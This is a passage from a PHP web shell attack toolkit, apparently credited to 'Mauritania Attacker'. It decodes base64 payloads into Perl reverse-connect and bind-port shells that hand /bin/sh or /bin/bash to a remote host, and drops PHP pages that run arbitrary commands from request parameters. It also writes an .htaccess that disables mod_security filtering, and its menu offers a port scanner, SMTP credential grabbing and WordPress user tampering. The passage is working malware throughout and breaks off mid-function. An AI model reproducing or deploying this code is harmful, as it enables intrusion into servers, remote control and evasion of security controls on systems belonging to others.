dyb3VuZC1jbGlwOiBwYWRkaW5nLWJveDsgIGJvcmRlcjogMXB4IHNvbGlkICMyODQ0NzM7ICBib3JkZXItYm90dG9tLWNvbG9yOiAjMjIzYjY2OyAgYm9yZGVyLXJhZGl1czogNHB4OyAgY3Vyc29yOiBwb2ludGVyOyAgYmFja2dyb3VuZC1pbWFnZTotd2Via2l0LWxpbmVhci1ncmFkaWVudCh0b3AsICNlYWVhZWEsICNkMGQwZDApOyAgYmFja2dyb3VuZC1pbWFnZTogLW1vei1saW5lYXItZ3JhZGllbnQodG9wLCAjZWFlYWVhLCAjZDBkMGQwKTsgIGJhY2tncm91bmQtaW1hZ2U6IC1vLWxpbmVhci1ncmFkaWVudCh0b3AsICNlYWVhZWEsICNkMGQwZDApOyAgYmFja2dyb3VuZC1pbWFnZTogbGluZWFyLWdyYWRpZW50KHRvIGJvdHRvbSwgI2VhZWFlYSwgI2QwZDBkMCk7ICAtd2Via2l0LWJveC1zaGFkb3c6IGluc2V0IDAgMXB4IHJnYmEoMjU1LCAyNTUsIDI1NSwgMC41KSwgaW5zZXQgMCAwIDdweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuNCksIDAgMXB4IDFweCByZ2JhKDAsIDAsIDAsIDAuMTUpOyAgYm94LXNoYWRvdzogaW5zZXQgMCAxcHggcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjUpLCBpbnNldCAwIDAgN3B4IHJnYmEoMjU1LCAyNTUsIDI1NSwgMC40KSwgMCAxcHggMXB4IHJnYmEoMCwgMCwgMCwgMC4xNSk7IH0gaW5wdXRbdHlwZT10ZXh0XXsgcGFkZGluZzogM3B4OyBjb2xvcjogIzAwOTkwMDsgdGV4dC1zaGFkb3c6ICM3Nzc3NzcgMHB4IDBweCAzcHg7IGJvcmRlcjogMXB4IHNvbGlkICMwMDc3MDA7IGJhY2tncm91bmQ6IHRyYW5zcGFyZW50OyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDA3NzAwOyAgICBwYWRkaW5nOiAzcHg7ICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOiA0cHg7ICAgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7ICAgYm9yZGVyLXJhZGl1czogNHB4OyAgIC13ZWJraXQtYm94LXNoYWRvdzogcmdiKDg1LDg1LDg1KSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYig4NSw4NSw4NSkgMHB4IDBweCA0cHg7fSBpbnB1dFt0eXBlPXN1Ym1pdF06aG92ZXIsIGlucHV0W3R5cGU9dGV4dF06aG92ZXJ7IGNvbG9yOiAjZmZmZmZmOyB0ZXh0LXNoYWRvdzogIzAwNjYwMCAwcHggMHB4IDRweDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwZGQwMDsgYm9yZGVyOiAxcHggc29saWQgIzAwZGQwMDsgICAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYmEoMCwxMTksMCkgMHB4IDBweCA0cHg7ICAgLW1vei1ib3gtc2hhZG93OiByZ2JhKDAsMTE5LDApIDBweCAwcHggNHB4O30gc2VsZWN0eyBwYWRkaW5nOiAzcHg7IHdpZHRoOiAxNjJweDsgY29sb3I6ICMwMGFhMDA7IHRleHQtc2hhZG93OiMwMDAgMHB4IDJweCA3cHg7IGJvcmRlcjogMXB4IHNvbGlkICMwMDc3MDA7IGJhY2tncm91bmQ6IHRyYW5zcGFyZW50OyB0ZXh0LWRlY29yYXRpb246IG5vbmU7IGJveC1zaGFkb3c6IDBweCAwcHggNHB4ICMwMGFhMDA7ICBwYWRkaW5nOiAzcHg7ICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOiA0cHg7ICAgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7ICAgYm9yZGVyLXJhZGl1czogNHB4OyAgIC13ZWJraXQtYm94LXNoYWRvdzogcmdiKDg1LCA4NSwgODUpIDBweCAwcHggNHB4OyAgIC1tb3otYm94LXNoYWRvdzogcmdiKDg1LCA4NSwgODUpIDBweCAwcHggNHB4O30gc2VsZWN0OmhvdmVyeyBib3JkZXI6IDFweCBzb2xpZCAjMDBkZDAwOyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDBkZDAwOyAgIHBhZGRpbmc6IDNweDsgICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDRweDsgICAtbW96LWJvcmRlci1yYWRpdXM6IDRweDsgICBib3JkZXItcmFkaXVzOiA0cHg7ICAgLXdlYmtpdC1ib3gtc2hhZG93OiByZ2JhKDAsMTE5LDApIDBweCAwcHggNHB4OyAgIC1tb3otYm94LXNoYWRvdzogcmdiYSgwLDExOSwwKSAwcHggMHB4IDRweDt9ICAgI2NvbW1hbmRzeyBtYXJnaW4tbGVmdDogMzUwcHg7IG1hcmdpbi1yaWdodDogMzUwcHg7IH0gb3B0aW9ueyBjb2xvcjogIzc3Nzc3NzsgfTwvc3R5bGU+DQo8P3BocA0KZWNobyAnPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwNzcwMCIgZmFjZT0iVGFob21hIiBzdHlsZT0iZm9udC1zaXplOiAxMnB0Ij5Vc2FnZTogcmV2ZXJzZXNoLnB5IFtpcG11XSBbUG9ydG11XTwvZm9udD4nOw0KZWNobyc8cCBhbGlnbj0iY2VudGVyIj4gDQo8aW1nIGJvcmRlcj0iMCI+PC9wPjxmb250IGZhY2U9IkdlbmV2YSIgYWxpZ249ImNlbnRlciIgc2l6ZT0iMiIgY29sb3I9IiMwMDk5MDAiPiBDb2RlZCBCeSBNYXVyaXRhbmlhIEF0dGFja2VyIDwvZm9udD48YnI+DQo8Zm9ybSBtZXRob2Q9Z2V0IGFjdGlvbj0iJy4kbWUuJyI+DQo8cD48dGV4dGFyZWEgY2xhc3M9ImFyZWEiIHJvd3M9IjEzIiBuYW1lPSJTMSIgY29scz0iNzAiID4nOw0KDQppZiAoc3RybGVuKCRfR0VUWydjb21tYW5kJ10pPjEgJiYgJF9HRVRbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfR0VUWydleGVjbWV0aG9kJ10oJF9HRVRbJ2NvbW1hbmQnXSk7fQ0KaWYgKHN0cmxlbigkX1BPU1RbJ2NvbW1hbmQnXSk+MSAmJiAkX1BPU1RbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfUE9TVFsnZXhlY21ldGhvZCddKCRfUE9TVFsnY29tbWFuZCddKTt9DQoNCmlmIChzdHJsZW4oJF9HRVRbJ2NvbW1hbmQnXSk+MSAmJiAkX0dFVFsnZXhlY21ldGhvZCddPT0icG9wZW4iKXsNCnBvcGVuKCRfR0VUWydjb21tYW5kJ10sInIiKTt9DQoNCmVjaG8nPC90ZXh0YXJlYT48L3A+DQo8cD48Y2VudGVyPklmIG5vdGhpbmcgd29yayBpdCBtZWFucyB0aGF0IHB5dGhvbiBpcyBub3QgZW5hYmxlZCBpbiB0aGlzIHNlcnZlciA6KDwvY2VudGVyPjwvcD4NCjxwIGFsaWduPSJjZW50ZXIiPjxzdHJvbmc+Q29tbWFuZDogcHl0aG9uIHJldmVyc2UucHkgeW91cklQIFBvcnQ8L3N0cm9uZz48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT0idnciIHNpemU9IjUwIiB2YWx1ZT0iY21kIj4gPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNvbW1hbmQiIHNpemU9IjQzIj4gPHNlbGVjdCBuYW1lPWV4ZWNtZXRob2Q+DQo8b3B0aW9uIHZhbHVlPSJzeXN0ZW0iPlN5c3RlbTwvb3B0aW9uPiAgPG9wdGlvbiB2YWx1ZT0iZXhlYyI+RXhlYzwvb3B0aW9uPiAgPG9wdGlvbiB2YWx1ZT0icGFzc3RocnUiPlBhc3N0aHJ1PC9vcHRpb24+PG9wdGlvbiB2YWx1ZT0icG9wZW4iPnBvcGVuPC9vcHRpb24+DQo8L3NlbGVjdD4gPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkV4ZWN1dGUiPg0KPC9wPjwvZm9ybT4nOw0KPz4=';
  3678. $file = fopen("kiter.php" ,"w+");
  3679. $write = fwrite ($file ,base64_decode($merdeeeee));
  3680. fclose($file);
  3681. echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#009900">Python Connect Shell Priv8</span><center><center><br><iframe src=pyrevrshell/kiter.php width=75% height=70% frameborder=0></iframe></div></center>';
  3682. }
  3683. elseif($_GET['do'] == 'pbc') {
  3684. echo "<center>";
  3685. echo "<ul>";
  3686. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3687. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3688. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3689. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3690. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3691. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3692. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3693. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3694. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3695. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3696. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3697. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3698. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3699. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3700. echo "</ul>";
  3701. echo "</center>";
  3702. mkdir('Backperlrev', 0755);
  3703. chdir('Backperlrev');
  3704. $kokwkwkwkwkw = ".htaccess";
  3705. $wkwkwkwkw_adi = "$kokwkwkwkwkw";
  3706. $wkwkwkwkw = fopen ($wkwkwkwkw_adi , 'w') or die ("wkwkwkwkw a&#231;&#305;lamad&#305;!");
  3707. $zilzil = "<IfModule mod_security.c>
  3708. SecFilterEngine Off
  3709. SecFilterScanPOST Off
  3710. </IfModule>";
  3711. fwrite ( $wkwkwkwkw , $zilzil ) ;
  3712. fclose ($wkwkwkwkw);
  3713. $shellololol = 'dXNlIElPOjpTb2NrZXQ7DQokc3lzdGVtICA9ICcvYmluL2Jhc2gnOw0KJEFSR0M9QEFSR1Y7DQpwcmludCAiQW5vbkdob3N0IEJBQ0stQ09OTkVDVCBCQUNLRE9PUlxuXG4iOw0KaWYgKCRBUkdDIT0yKSB7DQogICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7DQogICBkaWUgIkV4OiAkMCAxMjcuMC4wLjEgMjEyMSBcbiI7DQp9DQp1c2UgU29ja2V0Ow0KdXNlIEZpbGVIYW5kbGU7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gUmVzb2x2ZSBIb3N0IDooXG4iOw0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdCA6KFxuIjsNCnByaW50ICJbKl0gUmVzb2x2aW5nIEhvc3ROYW1lXG4iOw0KcHJpbnQgIlsqXSBDb25uZWN0aW5nLi4uICRBUkdWWzBdIFxuIjsNCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGwgXG4iOw0KcHJpbnQgIlsqXSBDb25uZWN0ZWQgdG8gcmVtb3RlIGhvc3QgXCEvIFxuIjsNClNPQ0tFVC0+YXV0b2ZsdXNoKCk7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsIj4mU09DS0VUIik7DQpwcmludCAiQW5vbkdob3N0IEJBQ0stQ09OTkVDVCBCQUNLRE9PUiAgXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVDtlY2hvIC0tPT1TeXN0ZW1pbmZvPT0tLTsgdW5hbWUgLWE7ZWNobzsNCmVjaG8gLS09PVVzZXJpbmZvPT0tLTsgaWQ7ZWNobztlY2hvIC0tPT1EaXJlY3Rvcnk9PS0tOyBwd2Q7ZWNobzsgZWNobyAtLT09U2hlbGw9PS0tICIpOw0Kc3lzdGVtKCRzeXN0ZW0pOw==';
  3714.  
  3715. $zerer = fopen("reverse.pl" ,"w+");
  3716. $write = fwrite ($zerer ,base64_decode($shellololol));
  3717. fclose($zerer);
  3718. chmod("reverse.pl",0755);
  3719.  
  3720. //extract php command shell
  3721. $zonop = 'PGh0bWw+PGhlYWQ+PHRpdGxlPkFub25HaG9zdCBQZXJsIENvbm5lY3QgU2hlbGwgUHJpdjg8L3RpdGxlPjxsaW5rIHJlbD0ic2hvcnRjdXQgaWNvbiIgaHJlZj0iaHR0cDovL3d3dzE0LjB6ejAuY29tLzIwMTQvMDYvMDQvMjEvMzk2NTU0Mzk0LnBuZyIgdHlwZT0iaW1hZ2UveC1pY29uIiAvPjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQpib2R5eyBiYWNrZ3JvdW5kLWNvbG9yOiB0cmFuc3BhcmVudCAhaW1wb3J0YW50OyBjb2xvcjogIzAwOTkwMDsgdGV4dC1zaGFkb3c6IzAwMCAwcHggMnB4IDdweDt9ICAgICAgYXt0ZXh0LWRlY29yYXRpb246bm9uZTsgZm9udC1mYW1pbHk6IFRhaG9tYSwgR2VuZXZhOyBjb2xvcjojMDA3NzAwOyBwYWRkaW5nOjJweCAycHg7fSAgICAgIGE6aG92ZXJ7Y29sb3I6IzAwOTkwMDsgdGV4dC1zaGFkb3c6IzAwZmYwMCAwcHggMHB4IDNweDt9CSAgLmFyZWEgeyBjb2xvcjogIzAwYmIwMDsgZm9udC1zaXplOiA5cHQ7IHRleHQtc2hhZG93OiMwMDAwMDAgMHB4IDJweCA3cHg7IGJvcmRlcjogc29saWQgMHB4ICMwMDc3MDA7IGJhY2tncm91bmQtY29sb3I6dHJhbnNwYXJlbnQ7IGJveC1zaGFkb3c6IDBweCAwcHggNHB4ICMwMDk5MDA7ICAgIHBhZGRpbmc6IDNweDsgICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDRweDsgICAtbW96LWJvcmRlci1yYWRpdXM6IDRweDsgICBib3JkZXItcmFkaXVzOiA0cHg7ICAgLXdlYmtpdC1ib3gtc2hhZG93OiByZ2IoMCwxMTksMCkgMHB4IDBweCA0cHg7ICAgLW1vei1ib3gtc2hhZG93OiByZ2IoMCwxMTksMCkgMHB4IDBweCA0cHg7IH0JICBpbnB1dFt0eXBlPXN1Ym1pdF17IHBhZGRpbmc6IDNweDsgY29sb3I6ICMwMDc3MDsgIGZvbnQtd2VpZ2h0OiBib2xkOyB0ZXh0LWFsaWduOiBjZW50ZXI7ICB0ZXh0LXNoYWRvdzogMCAxcHggcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjMpOyAgYmFja2dyb3VuZDogI2FlYWVhZTsgIGJhY2tncm91bmQtY2xpcDogcGFkZGluZy1ib3g7ICBib3JkZXI6IDFweCBzb2xpZCAjMjg0NDczOyAgYm9yZGVyLWJvdHRvbS1jb2xvcjogIzIyM2I2NjsgIGJvcmRlci1yYWRpdXM6IDRweDsgIGN1cnNvcjogcG9pbnRlcjsgIGJhY2tncm91bmQtaW1hZ2U6LXdlYmtpdC1saW5lYXItZ3JhZGllbnQodG9wLCAjZWFlYWVhLCAjZDBkMGQwKTsgIGJhY2tncm91bmQtaW1hZ2U6IC1tb3otbGluZWFyLWdyYWRpZW50KHRvcCwgI2VhZWFlYSwgI2QwZDBkMCk7ICBiYWNrZ3JvdW5kLWltYWdlOiAtby1saW5lYXItZ3JhZGllbnQodG9wLCAjZWFlYWVhLCAjZDBkMGQwKTsgIGJhY2tncm91bmQtaW1hZ2U6IGxpbmVhci1ncmFkaWVudCh0byBib3R0b20sICNlYWVhZWEsICNkMGQwZDApOyAgLXdlYmtpdC1ib3gtc2hhZG93OiBpbnNldCAwIDFweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuNSksIGluc2V0IDAgMCA3cHggcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjQpLCAwIDFweCAxcHggcmdiYSgwLCAwLCAwLCAwLjE1KTsgIGJveC1zaGFkb3c6IGluc2V0IDAgMXB4IHJnYmEoMjU1LCAyNTUsIDI1NSwgMC41KSwgaW5zZXQgMCAwIDdweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuNCksIDAgMXB4IDFweCByZ2JhKDAsIDAsIDAsIDAuMTUpOyB9IGlucHV0W3R5cGU9dGV4dF17IHBhZGRpbmc6IDNweDsgY29sb3I6ICMwMDk5MDA7IHRleHQtc2hhZG93OiAjNzc3Nzc3IDBweCAwcHggM3B4OyBib3JkZXI6IDFweCBzb2xpZCAjMDA3NzAwOyBiYWNrZ3JvdW5kOiB0cmFuc3BhcmVudDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwNzcwMDsgICAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYig4NSw4NSw4NSkgMHB4IDBweCA0cHg7ICAgLW1vei1ib3gtc2hhZG93OiByZ2IoODUsODUsODUpIDBweCAwcHggNHB4O30gaW5wdXRbdHlwZT1zdWJtaXRdOmhvdmVyLCBpbnB1dFt0eXBlPXRleHRdOmhvdmVyeyBjb2xvcjogI2ZmZmZmZjsgdGV4dC1zaGFkb3c6ICMwMDY2MDAgMHB4IDBweCA0cHg7IGJveC1zaGFkb3c6IDBweCAwcHggNHB4ICMwMGRkMDA7IGJvcmRlcjogMXB4IHNvbGlkICMwMGRkMDA7ICAgIHBhZGRpbmc6IDNweDsgICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDRweDsgICAtbW96LWJvcmRlci1yYWRpdXM6IDRweDsgICBib3JkZXItcmFkaXVzOiA0cHg7ICAgLXdlYmtpdC1ib3gtc2hhZG93OiByZ2JhKDAsMTE5LDApIDBweCAwcHggNHB4OyAgIC1tb3otYm94LXNoYWRvdzogcmdiYSgwLDExOSwwKSAwcHggMHB4IDRweDt9IHNlbGVjdHsgcGFkZGluZzogM3B4OyB3aWR0aDogMTYycHg7IGNvbG9yOiAjMDBhYTAwOyB0ZXh0LXNoYWRvdzojMDAwIDBweCAycHggN3B4OyBib3JkZXI6IDFweCBzb2xpZCAjMDA3NzAwOyBiYWNrZ3JvdW5kOiB0cmFuc3BhcmVudDsgdGV4dC1kZWNvcmF0aW9uOiBub25lOyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDBhYTAwOyAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYig4NSwgODUsIDg1KSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYig4NSwgODUsIDg1KSAwcHggMHB4IDRweDt9IHNlbGVjdDpob3ZlcnsgYm9yZGVyOiAxcHggc29saWQgIzAwZGQwMDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwZGQwMDsgICBwYWRkaW5nOiAzcHg7ICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOiA0cHg7ICAgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7ICAgYm9yZGVyLXJhZGl1czogNHB4OyAgIC13ZWJraXQtYm94LXNoYWRvdzogcmdiYSgwLDExOSwwKSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYmEoMCwxMTksMCkgMHB4IDBweCA0cHg7fSAgICNjb21tYW5kc3sgbWFyZ2luLWxlZnQ6IDM1MHB4OyBtYXJnaW4tcmlnaHQ6IDM1MHB4OyB9IG9wdGlvbnsgY29sb3I6ICM3Nzc3Nzc7IH08L3N0eWxlPg0KPD9waHANCmVjaG8gJzxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDc3MDAiIGZhY2U9IlRhaG9tYSIgc3R5bGU9ImZvbnQtc2l6ZTogMTFwdCI+VXNhZ2U6IHBlcmwgcmV2ZXJzZS5wbCBbaXBtdV0gW1BvcnRtdV08L2ZvbnQ+PGJyPic7DQplY2hvJzxwIGFsaWduPSJjZW50ZXIiPiANCjxpbWcgYm9yZGVyPSIwIiA+PC9wPjxmb250IGZhY2U9IkdlbmV2YSIgYWxpZ249ImNlbnRlciIgc2l6ZT0iMiIgY29sb3I9IiMwMDc3MDAiPiBDb2RlZCBCeSBNYXVyaXRhbmlhIEF0dGFja2VyIDwvZm9udD48YnI+DQo8Zm9ybSBtZXRob2Q9Z2V0IGFjdGlvbj0iJy4kbWUuJyI+DQo8dGV4dGFyZWEgY2xhc3M9ImFyZWEiIHJvd3M9IjEzIiBuYW1lPSJTMSIgY29scz0iNzAiID4nOw0KDQppZiAoc3RybGVuKCRfR0VUWydjb21tYW5kJ10pPjEgJiYgJF9HRVRbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfR0VUWydleGVjbWV0aG9kJ10oJF9HRVRbJ2NvbW1hbmQnXSk7fQ0KaWYgKHN0cmxlbigkX1BPU1RbJ2NvbW1hbmQnXSk+MSAmJiAkX1BPU1RbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfUE9TVFsnZXhlY21ldGhvZCddKCRfUE9TVFsnY29tbWFuZCddKTt9DQoNCmlmIChzdHJsZW4oJF9HRVRbJ2NvbW1hbmQnXSk+MSAmJiAkX0dFVFsnZXhlY21ldGhvZCddPT0icG9wZW4iKXsNCnBvcGVuKCRfR0VUWydjb21tYW5kJ10sInIiKTt9DQoNCmVjaG8nPC90ZXh0YXJlYT4NCjxwPjxjZW50ZXI+SWYgbm90aGluZyB3b3JrIGl0IG1lYW5zIHRoYXQgcGVybCBpcyBub3QgZW5hYmxlZCBpbiB0aGlzIHNlcnZlciA6KDwvY2VudGVyPjwvcD4NCjxwIGFsaWduPSJjZW50ZXIiPjxzdHJvbmc+Q29tbWFuZDogcGVybCByZXZlcnNlLnBsIHlvdXJJUCBQb3J0PC9zdHJvbmc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9InZ3IiBzaXplPSI1MCIgdmFsdWU9ImNtZCI+IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjb21tYW5kIiBzaXplPSI0MyI+IDxzZWxlY3QgbmFtZT1leGVjbWV0aG9kPg0KPG9wdGlvbiB2YWx1ZT0ic3lzdGVtIj5TeXN0ZW08L29wdGlvbj4gIDxvcHRpb24gdmFsdWU9ImV4ZWMiPkV4ZWM8L29wdGlvbj4gIDxvcHRpb24gdmFsdWU9InBhc3N0aHJ1Ij5QYXNzdGhydTwvb3B0aW9uPjxvcHRpb24gdmFsdWU9InBvcGVuIj5wb3Blbjwvb3B0aW9uPg0KPC9zZWxlY3Q+IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJFeGVjdXRlIj4NCjwvcD48L2Zvcm0+JzsNCj8+';
  3722. $file = fopen("kit.php" ,"w+");
  3723. $write = fwrite ($file ,base64_decode($zonop));
  3724. fclose($file);
  3725.  
  3726. echo "<br><center><span style='font-size:30px; font-family:Fredericka the Great; color:#009900'>Perl Connect Shell Priv8</span></b><center><br><iframe src=Backperlrev/kit.php width=75% height=60% frameborder=0></iframe></div></center>";
  3727.  
  3728. }
  3729. elseif($_GET['do'] == 'bc') {
  3730. echo "<center>";
  3731. echo "<ul>";
  3732. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3733. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3734. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3735. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3736. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3737. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3738. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3739. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3740. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3741. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3742. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3743. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3744. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3745. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3746. echo "</ul>";
  3747. echo "</center>";
  3748. echo "<form method='post'>
  3749. <u>Bind Port:</u> <br>
  3750. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  3751. <input type='submit' name='sub_bp' value='>>'>
  3752. </form>
  3753. <form method='post'>
  3754. <u>Back Connect:</u> <br>
  3755. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  3756. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  3757. <input type='submit' name='sub_bc' value='>>'>
  3758. </form>";
  3759. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  3760. if(isset($_POST['sub_bp'])) {
  3761. $f_bp = fopen("/tmp/bp.pl", "w");
  3762. fwrite($f_bp, base64_decode($bind_port_p));
  3763. fclose($f_bp);
  3764.  
  3765. $port = $_POST['port_bind'];
  3766. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  3767. sleep(1);
  3768. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  3769. unlink("/tmp/bp.pl");
  3770. }
  3771. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  3772. if(isset($_POST['sub_bc'])) {
  3773. $f_bc = fopen("/tmp/bc.pl", "w");
  3774. fwrite($f_bc, base64_decode($bind_connect_p));
  3775. fclose($f_bc);
  3776.  
